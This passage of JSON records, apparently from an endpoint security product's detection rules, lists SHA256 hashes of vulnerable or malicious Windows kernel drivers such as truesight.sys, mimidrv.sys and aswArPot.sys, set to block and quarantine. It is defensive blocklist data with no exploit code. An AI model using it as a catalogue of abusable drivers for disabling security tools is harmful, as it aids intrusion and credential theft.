"2b4af74d74a4380130a1c46d2f1ffe112d87d9d7646540bbbd201c5bd176082b", + "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56436029-5d9d-53d7-b9a7-21d497b6fc60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815934Z", + "creation_date": "2026-03-23T11:45:30.815936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815942Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ea2a3a6edb3c772f9d358a720f9106260ef22d339bd3c7895e7b5cda03e424d", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56441626-5caa-52a6-8fbc-1a1b25e8742f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976714Z", + "creation_date": "2026-03-23T11:45:29.976717Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38dc036f6cd4917b816e6c362fab85012659225558d8a285ff53cae3ebbdff6c", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5657b5eb-897c-5b2d-8fa4-52c8ca33a55d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605682Z", + "creation_date": "2026-03-23T11:45:29.605684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08f80ad2c7614874b87fcf907a49c7f5a7e2816907283c19c6ff4f7b982da83f", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "565e8b69-dfbc-5d47-955f-78cdb4885619", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973654Z", + "creation_date": "2026-03-23T11:45:29.973656Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5027fce41ed60906a0e76b97c95c2a5a83d57a2d1cd42de232a21f26c0d58e48", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56637350-6aea-555e-8528-10845613db85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604446Z", + "creation_date": "2026-03-23T11:45:29.604448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a2d4815a03365d40b2b22981d4d8bee81bfbd983db1af30ce497fcdf77f83c9", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56824a2c-5a67-5eaf-bc35-4b270622f0a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980237Z", + "creation_date": "2026-03-23T11:45:29.980239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "567809308cfb72d59b89364a6475f34a912d03889aa50866803ac3d0bf2c3270", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "568a2260-7822-559f-8712-91b6d9001238", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489126Z", + "creation_date": "2026-03-23T11:45:31.489128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"af8965f99b720fae41fe2516dd6a670eefb81fb75817ae0a0d2b9299226ec22c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56998a53-b33e-5878-a59c-efb8de52bad8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480622Z", + "creation_date": "2026-03-23T11:45:31.480626Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32be3865897c1423e766f12f0844379dbf66b3453573baa7208cffa5f2863380", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "569ccba0-7180-5c9f-aab3-dff41529e892", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473005Z", + "creation_date": "2026-03-23T11:45:31.473008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec5a5a764b10d24330442ad8c430689cf9fe3d3d5736a865024b0fe69200fedf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "569d7171-641e-5dad-8fdb-0c2e5086d9de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464762Z", + "creation_date": "2026-03-23T11:45:30.464766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464774Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56ac63a3-f3c1-542d-8ed2-361423412c15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817097Z", + "creation_date": "2026-03-23T11:45:31.817099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817105Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "273fb23894e8fc17634c298d924c95bc49f7dddb11a7b9aa6204bb377371445e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56bb8a44-0b37-5722-8d54-42f8091f25fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454358Z", + "creation_date": 
"2026-03-23T11:45:30.454362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56c72148-3d6a-5bc0-b96b-42db4ccd9943", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819550Z", + "creation_date": "2026-03-23T11:45:30.819552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64a8e00570c68574b091ebdd5734b87f544fa59b75a4377966c661d0475d69a5", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56c87519-c83c-54bf-86b5-35d2f50f8a13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972301Z", + "creation_date": "2026-03-23T11:45:29.972303Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94b42f99cb2ac4db601a3759afe374168bad1714bd48662d74fed69099517a65", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56cd4429-61e3-527d-af02-afd9fd8fc001", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156466Z", + "creation_date": "2026-03-23T11:45:31.156468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156474Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15a4c8495fc6e8d94c7b7a2f8a05ed92a563b51f915929ef2e46261ac5793a07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56d89bbc-8281-50e1-b537-f63b2906bda9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823179Z", + "creation_date": "2026-03-23T11:45:31.823182Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823190Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10604ddc07eb097b4ec8cfaff0b94f35722baab0e8e4ac66fecf2aa2b45a5c1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56ec96f0-ffc5-5419-97a3-134ed8446ac1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492785Z", + "creation_date": "2026-03-23T11:45:31.492787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fd5786000e1c8e0c60129b3acfe9ae0128f8c4fadb5308ed8e05207c7dffecc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56ee56dd-cd2f-5962-ada6-e3af6b0ad354", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482663Z", + "creation_date": "2026-03-23T11:45:31.482667Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482677Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9347d7132656d9e9996aef18700e0cc8abb3e88b082b78ed1ece49c5614cb745", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56fedf0c-150a-5ed8-9ca6-d1fac98d887f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159768Z", + "creation_date": "2026-03-23T11:45:31.159770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ccab572ef2e48b88b5771be6f1c8edbbbf726ab25fcf104ac7cc309ab5d0cb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57064d2b-418b-50c2-b59c-2194f0a14f27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147824Z", + "creation_date": "2026-03-23T11:45:31.147826Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a10f757dff2b419be2a656edb466d23dd04f1e3bcba39f8d5b371b9a7075eff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5719b49c-488e-5201-91ae-dddb68c22ae9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808939Z", + "creation_date": "2026-03-23T11:45:31.808942Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808954Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "add7cf1ac2d779e1c976e9f71ab09fbf907c1ba6e77e8c8d55c5dab4d73a2d4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "571a10f6-eeed-5b34-93ad-7a5f4d74315f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472314Z", + "creation_date": "2026-03-23T11:45:30.472318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472327Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a0702681bc51419fbd336817787a966c7f92cabe09f8e959251069578dfa881", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "572affc0-f4b9-514d-9c5a-7a9600d5bc75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154282Z", + "creation_date": "2026-03-23T11:45:31.154284Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7267ed91737dfcf283c524f8f77119afc4ca9dd679f35fafe1187be8f815f6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "572d304f-d972-5498-9537-6462a3a34e91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969274Z", + "creation_date": "2026-03-23T11:45:29.969276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad8ffccfde782bc287241152cf24245a8bf21c2530d81c57e17631b3c4adb833", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57325f85-54a4-5fa6-b985-392f892907c5", + 
